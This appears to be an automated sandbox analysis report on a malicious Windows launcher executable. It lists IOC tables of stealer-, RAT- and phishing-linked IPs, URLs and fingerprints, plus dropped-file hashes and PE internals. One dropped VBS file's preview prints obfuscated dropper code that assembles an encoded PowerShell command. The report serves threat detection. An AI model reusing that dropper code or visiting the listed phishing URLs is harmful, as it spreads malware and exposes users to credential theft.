	66e7fc6131f5ccda47ce44ce_kudifosefozo.pdf	Get hash	malicious	Unknown	Browse	172.253.124.94
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	SoftWare(1).exe	Get hash	malicious	LummaC Stealer	Browse	217.20.48.23
	launch3r-v2.2.2.exe	Get hash	malicious	LummaC Stealer	Browse	217.20.55.34
	SecuriteInfo.com.Trojan.Heur.TP.RuW@bOo3uBfc.2836.5163.exe	Get hash	malicious	LummaC Stealer	Browse	217.20.55.22
	SecuriteInfo.com.Win32.MalwareX-gen.12458.14123.exe	Get hash	malicious	LummaC Stealer	Browse	217.20.48.39
	4nsy2bvYRk.exe	Get hash	malicious	ScreenConnect Tool	Browse	217.20.48.19
	Quotation.xla.xlsx	Get hash	malicious	Unknown	Browse	208.89.73.27
	Quotation.xla.xlsx	Get hash	malicious	Unknown	Browse	208.89.73.21
	Quotation.xla.xlsx	Get hash	malicious	Unknown	Browse	208.89.73.19
	sPDwT5Hyb5.exe	Get hash	malicious	LummaC Stealer	Browse	208.89.73.31
	final-payload.bin.exe	Get hash	malicious	Unknown	Browse	208.89.73.17

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASLINE-AS-APASLINELIMITEDHK	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	62.60.234.80
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	62.60.234.80
	#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f.exe	Get hash	malicious	LummaC Stealer	Browse	62.60.234.80
	Set_Up.exe	Get hash	malicious	LummaC Stealer	Browse	62.60.234.80
	#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f.exe	Get hash	malicious	LummaC Stealer	Browse	62.60.234.80
	Set_Up.exe	Get hash	malicious	LummaC Stealer	Browse	62.60.234.80
	nabarm7.elf	Get hash	malicious	Unknown	Browse	156.241.241.122
	File Setup.exe	Get hash	malicious	LummaC Stealer	Browse	62.60.234.80
	Setup-v_patched.exe	Get hash	malicious	LummaC Stealer	Browse	62.60.234.80
	88888.bin.exe	Get hash	malicious	Unknown	Browse	62.60.234.80
CLOUDFLARENETUS	nnnaaasssaaa.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.49.165
	nper1lu.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.42.7
	nertuetetaaa.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.197.226
	nbertioures.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.187.144
	mobepe.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	mopertuirets.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.44.10
	gebrelas.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.197.226
	boitrlkg.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.197.226
	SetupByLumenTeamV10.16.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.44.10
	gigngapole1.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.131.174
FASTLYUS	SetupByLumenTeamV10.16.exe	Get hash	malicious	LummaC Stealer	Browse	185.199.110.133
	NatchoPremium.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	NatchoPremium.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	NATCHO CHEAT.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	NATCHO CHEAT.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	https://jqih.ugsczwgr.es/d3LuDl4019e/$kwidmann@vulcancorp.com	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	185.199.110.133
	https://tn.dtrkr.com/clicks/html/f7f3bc54-3b40-5909-9d88-40bb36aec0be/703e7811-846d-5692-8893-6a20182f0f3c/ab3334d2-8ad0-5099-886a-1ee09ba18f05?urlChildId=3168b557-98fe-5577-b9ab-369782ae95a1&templateId=5d115dfc-e81d-46d4-b569-1726b7798919#user_email=sample@domain.com&fname=Nice&lname=Try	Get hash	malicious	Unknown	Browse	151.101.194.137
	http://www.tnstep.org	Get hash	malicious	Unknown	Browse	199.232.192.193
	https://www.create.xyz/share/43b1d967-ab8a-4d73-8fce-815c7edc3bdf	Get hash	malicious	Unknown	Browse	151.101.2.132
	https://cola-careers.site/apply/id834285345	Get hash	malicious	Unknown	Browse	151.101.193.229

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://www.canva.com/design/DAGkPkwDgSg/u9VDlBP5gFpCWakWq8SpPQ/view?utm_content=DAGkPkwDgSg&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hc42c7e8522	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	204.79.197.222
	SecuriteInfo.com.Win32.MalwareX-gen.29703.7480.exe	Get hash	malicious	Unknown	Browse	204.79.197.222
	SecuriteInfo.com.Win32.MalwareX-gen.26952.14499.exe	Get hash	malicious	Unknown	Browse	204.79.197.222
	Aspen Landscaping Project.pdf.svg	Get hash	malicious	HTMLPhisher	Browse	204.79.197.222
	http://url7554.impulseup.com/ls/click?upn=u001.9-2FTADgI74e2OWE2P3fvtm3ks0lxIlIFyP5IwbLoDgBuxxxaTOIUzJMW49-2B9jqW6yELBC1ZQRMe6TWLgjPYTu0LiDQ0w3txTcOK6-2FV2ifPZbRaLIwmmOQ1GMQC9dU6RWb2aeLLtDeODHngY3VjjXvJO6oKDlYY-2FrsIGLii2s3kEKAZFDtf-2BL31aMPuCVwlwPCr7PEQRptcwz1QBhdaSd2LGMdK1VJSRTe40dM32Z7Jz2jBBbK0UwZYo0lLPRxihoyt5eczvkRV2tuefWun26R7i639CvHIPVt6rH7EVtY4Yq4-2BX81bSKNRYMont-2BURzxOXvIrvc-2FmXDxBQFquNv8hCg-3D-3DyDrr_naDZr6e6Tex7WwaKSXKSqq5INCcbCIdoxaaj2wbq7gjxBRbem7BEPIfWnVuAg3Bx1Fhri61H6wFbqCRaRuLXkT18hZCnXSGoRllL0C7rOtB91UeOJXduRfzcRPgDbBSd4X3uGtLfJirZl0ROKoAxqfXL7L4ToaeE6JzoQeI9uGX5kpoV7VcnaOLTWFbow5cQRwEdNeJ6VY-2B-2FtfbcKyooiw-3D-3D	Get hash	malicious	HTMLPhisher	Browse	204.79.197.222
	https://review-bid-proposal-invitation-6987b4.webflow.io/	Get hash	malicious	Unknown	Browse	204.79.197.222
	http://tvstream.live	Get hash	malicious	Unknown	Browse	204.79.197.222
	https://app.balidewatransport.com/index.html//?uuq_tgnqcf=vtwg	Get hash	malicious	Unknown	Browse	204.79.197.222
	http://business-letter-format.com	Get hash	malicious	HTMLPhisher	Browse	204.79.197.222
	9lBc54z9La.exe	Get hash	malicious	AsyncRAT	Browse	204.79.197.222
3b5074b1b5d032e5620f69f9f700ff0e	SetupByLumenTeamV10.16.exe	Get hash	malicious	LummaC Stealer	Browse	185.199.108.153
	launcher.exe	Get hash	malicious	DarkTortilla, LummaC Stealer	Browse	185.199.108.153
	Docx77202550026400210011skbmt.lnk	Get hash	malicious	Unknown	Browse	185.199.108.153
	21938546052.zip	Get hash	malicious	Unknown	Browse	185.199.108.153
	4nsy2bvYRk.exe	Get hash	malicious	ScreenConnect Tool	Browse	185.199.108.153
	4nsy2bvYRk.exe	Get hash	malicious	ScreenConnect Tool	Browse	185.199.108.153
	New Purchase Order.exe	Get hash	malicious	AgentTesla	Browse	185.199.108.153
	PROCESO.3.1.305884.20250207.2025020715301400000008.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	185.199.108.153
	InvoiceReport78410025000003658468.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.199.108.153
	Payment Swift-Copy MT103.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.199.108.153

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3073251249425524
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrA:KooCEYhgYEL0In
MD5:	1D060AF4DAADEA0D3ED58B3007236049
SHA1:	1E65522B44E126970741D902759C70F60162B567
SHA-256:	448B8228114F382D6BEBAF6576BB1C169399ACCB05957D819EE9E5993DF88E66
SHA-512:	2E8F818E56D1C9541538A9C80EE4DADCAA9743CB9BB05D539731B809C9CF8CFA041003971155A20FA1BFED500A877E858701C7232FF3BE8DBB951A5E41328D02
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x781ad5cf, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42211299755226867
Encrypted:	false
SSDEEP:	1536:BSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Baza/vMUM2Uvz7DO
MD5:	D492B9A72469AA9EB29F489DC32EFF25
SHA1:	CFDC630CF725C6059ACC8F810FFB5EFC83910DE6
SHA-256:	8A1805F55E4254F8D7B0857CDFCD2D0FEC52B87EFD85FCE58DF4A18010100F6E
SHA-512:	B0908FA4231D02CA5A1392ADE60883F7ACBAAB0A61C160ACA96A353D4F494538CA62F7C299B98EAEF214E3F5512CBBFF113642AF3C1C8591DF258D3F1FF218F5
Malicious:	false
Preview:	x...... .......A.......X\...;...{......................0.!..........{A.,....}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{......................................,....}.....................,....}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.0754225171288591
Encrypted:	false
SSDEEP:	3:qNYe+/Rr7ajn13a/wRrXlallcVO/lnlZMxZNQl:0zK7a53qEXAOewk
MD5:	D7AA2CE1585EC9D8E00258F1067CACC0
SHA1:	1D0410E4E46893F367FDFF7D7D3902EA7EB7E617
SHA-256:	BB84A2D6A413C0AC9CF3B51C45123AAFBD6C3538494A3B5389D74546B5ABA76B
SHA-512:	5C264D9A822871BB36D219A531082319C379A69F2526F22410A780E44592A142906C303D69A486322374FF627D478B13278F489C2E237B1896037F0BB6C98451
Malicious:	false
Preview:	1.[......................................;...{..,....}.......{A..............{A......{A..........{A]...................,....}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul55bl/Z:NllU
MD5:	D3B86703AAED73DD3EC0A467E8E94A75
SHA1:	0F4F7B2D253B1E5317E0523C584323EFE648AFCC
SHA-256:	B3FA547E57A764C37C994F3A72929E499C8AAEDA177BDBACD9E7F3C8A34348E1
SHA-512:	D358B7BAFDC693B4B7BA03638A67A5D27F3C3C3C222DDC015A0BCA3383510AF3AAB54D088EC6BF995580C3EA3B68AC78A11AE4360486886BA4DAEB2C631FA941
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\IXP000.TMP\67f525209658e.vbs

Download File

Process:	C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	13451
Entropy (8bit):	5.360428278407847
Encrypted:	false
SSDEEP:	192:+lUDyyyyyyyyyyEBB/abk6n+4BYZN6YxQMbF0t43gtQwT7TyauayCspkhK3Uuy7T:ShItp4NXudvYPoTxKGwa
MD5:	765EE19C7067124DD4904EA24E90EABB
SHA1:	2DC70716209F6C86BC55353D4720FDB4EB7722C0
SHA-256:	81E8BD1CFBFFF36B8773BDA24940D0FA4ABE9DF5081ED785E95687405AF13747
SHA-512:	F4E9DD70E1169CB6B3E885F0ED32D000E080907E06CA01F1D20DFB4D0616737E249C1811135E3E42DDF4E2DEF06359E79A61AD44A2D43B414565F49150603823
Malicious:	true
Preview:	'g..Public Const mkrdSrfdemn = "mrfposSfijd"..pdbpbSSImnk = rRegisggfgdsdfsdffdhgjg211 & ""..sfdfing = TimeSerial(9,8,9)..sfdfing = TimeSerial(19,2,1)..sfdfing = TimeSerial(21,2,1)..ooeIfcF = "hffffg" & LenB("rAmaffhcb") & "hfffg"..sfdfing = TimeSerial(21,2,1)..sfdfing = TimeSerial(21,2,1)..sfdfing = TimeSerial(21,2,1)..sfdfing = TimeSerial(21,2,1)..sfdfing = TimeSerial(21,2,1)..sfdfing = TimeSerial(21,2,1)..sfdfing = TimeSerial(21,2,1)..sfdfing = TimeSerial(21,2,1)..sfdfing = TimeSerial(21,2,1)..sfdfing = TimeSerial(21,2,1)..sfdfing = TimeSerial(21,2,1)..Call Ugsfiffsging("$do" & "sigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@Zw")..Call Ugsfiffsging("Bl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM")..IIcSckek = TimeSerial(7,8,8)..Public Const eimrhFkk = "dmdamrjfi"..kFkdIeI = "hffufg" & LenB("jAppAriro") & "hfg"..Call Ugsfiffsging("@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I")..Call Ugsfiffsging(

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14fuzhmv.xmy.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gycc5epo.f02.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1eildwh.3zh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h2d3d2qh.otq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktnvwvg3.o2q.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkyn4ab4.olt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.838578883014015
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	IMSoftware{Launcher}3.21.exe
File size:	162'304 bytes
MD5:	ea61922dae2d227f2a8541d653801603
SHA1:	89b0a442504b485cb01dc65eff91db22ab11c668
SHA256:	210ef5b2cef2850fac76f9542ef21b3dfd704cf5912a74d7a429563f8d48226b
SHA512:	21198034c95f23a39a4e3e8a0ba7990256ee42407e3c2891073a8880e607d6eb59ff1eee90373ed572e935a13780ec1d62ea1354bf009667edd3163b6a7ec2cf
SSDEEP:	3072:GahKyd2n31L5GWp1icKAArDZz4N9GhbkrNEk1GT:GahOjp0yN90QEh
TLSH:	6FF38D4A73E420A6E4B653B498F202939A32BCB15B7582FF12D4D57E0E336D4A532F17
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."

File Icon


Icon Hash:	3b6120282c4c5a1f

Static PE Info

General

Entrypoint:	0x140008200
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	10
OS Version Minor:	0
File Version Major:	10
File Version Minor:	0
Subsystem Version Major:	10
Subsystem Version Minor:	0
Import Hash:	4cea7ae85c87ddc7295d39ff9cda31d1

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FE359325350h
dec eax
add esp, 28h
jmp 00007FE359324BFBh
int3
int3
int3
int3
int3
int3
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], edi
inc ecx
push esi
dec eax
sub esp, 000000B0h
and dword ptr [esp+20h], 00000000h
dec eax
lea ecx, dword ptr [esp+40h]
call dword ptr [000011CDh]
nop
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ebx, dword ptr [eax+08h]
xor edi, edi
xor eax, eax
dec eax
cmpxchg dword ptr [00004922h], ebx
je 00007FE359324BFCh
dec eax
cmp eax, ebx
jne 00007FE359324C0Ch
mov edi, 00000001h
mov eax, dword ptr [00004918h]
cmp eax, 01h
jne 00007FE359324C09h
lea ecx, dword ptr [eax+1Eh]
call 00007FE3593251E3h
jmp 00007FE359324C6Ch
mov ecx, 000003E8h
call dword ptr [0000117Eh]
jmp 00007FE359324BB9h
mov eax, dword ptr [000048F6h]
test eax, eax
jne 00007FE359324C4Bh
mov dword ptr [000048E8h], 00000001h
dec esp
lea esi, dword ptr [000013E9h]
dec eax
lea ebx, dword ptr [000013CAh]
dec eax
mov dword ptr [esp+30h], ebx
mov dword ptr [esp+24h], eax
dec ecx
cmp ebx, esi
jnc 00007FE359324C17h
test eax, eax
jne 00007FE359324C17h
dec eax
cmp dword ptr [ebx], 00000000h
je 00007FE359324C02h
dec eax
mov eax, dword ptr [ebx]
dec eax
mov ecx, dword ptr [00001388h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa23c	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf000	0x1c8f4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xe000	0x408	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2c000	0x20	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x9a10	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x9010	0x118	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9128	0x520	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7b80	0x7c00	60800deac1fde21b98089f2241ee6168	False	0.5499936995967742	data	6.096261782871538	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x22c8	0x2400	59d15cdf89780817c3d48dd588a6a129	False	0.4136284722222222	data	4.727841929207054	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0x1f00	0x400	9d1580dccaf8e787a43caf4bba48a079	False	0.3212890625	data	3.1889769845125677	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0xe000	0x408	0x600	15cd12257317071f28e4f7b728f8825e	False	0.3932291666666667	data	3.1563665040475675	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xf000	0x1d000	0x1ca00	fe786a96a3d401eff947580c93c28427	False	0.7361234306768559	data	7.034155649464836	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2c000	0x20	0x200	637787151ee546a94902de9694a58fd6	False	0.083984375	data	0.4068473715812382	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AVI	0xf9f8	0x2e1a	RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp	English	United States	0.2713099474665311
RT_ICON	0x12814	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.3225609756097561
RT_ICON	0x12e7c	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.41263440860215056
RT_ICON	0x13164	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States	0.4569672131147541
RT_ICON	0x1334c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.5574324324324325
RT_ICON	0x13474	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.6223347547974414
RT_ICON	0x1431c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.7369133574007221
RT_ICON	0x14bc4	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States	0.783410138248848
RT_ICON	0x1528c	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.3829479768786127
RT_ICON	0x157f4	0xd9d2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	1.0004662673505254
RT_ICON	0x231c8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5300829875518672
RT_ICON	0x25770	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6137429643527205
RT_ICON	0x26818	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.703688524590164
RT_ICON	0x271a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.425531914893617
RT_DIALOG	0x27608	0x2f2	data	English	United States	0.4389920424403183
RT_DIALOG	0x278fc	0x1b0	data	English	United States	0.5625
RT_DIALOG	0x27aac	0x166	data	English	United States	0.5223463687150838
RT_DIALOG	0x27c14	0x1c0	data	English	United States	0.5446428571428571
RT_DIALOG	0x27dd4	0x130	data	English	United States	0.5526315789473685
RT_DIALOG	0x27f04	0x120	data	English	United States	0.5763888888888888
RT_STRING	0x28024	0x8c	Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0	English	United States	0.6214285714285714
RT_STRING	0x280b0	0x520	data	English	United States	0.4032012195121951
RT_STRING	0x285d0	0x5cc	data	English	United States	0.36455525606469
RT_STRING	0x28b9c	0x4b0	data	English	United States	0.385
RT_STRING	0x2904c	0x44a	data	English	United States	0.3970856102003643
RT_STRING	0x29498	0x3ce	data	English	United States	0.36858316221765913
RT_RCDATA	0x29868	0x7	ASCII text, with no line terminators	English	United States	2.142857142857143
RT_RCDATA	0x29870	0x1358	Microsoft Cabinet archive data, Windows 2000/XP setup, 4952 bytes, 1 file, at 0x2c +A "67f525209658e.vbs", ID 1163, number 1, 1 datablock, 0x1503 compression	English	United States	1.002221324717286
RT_RCDATA	0x2abc8	0x4	data	English	United States	3.0
RT_RCDATA	0x2abcc	0x24	data	English	United States	0.7222222222222222
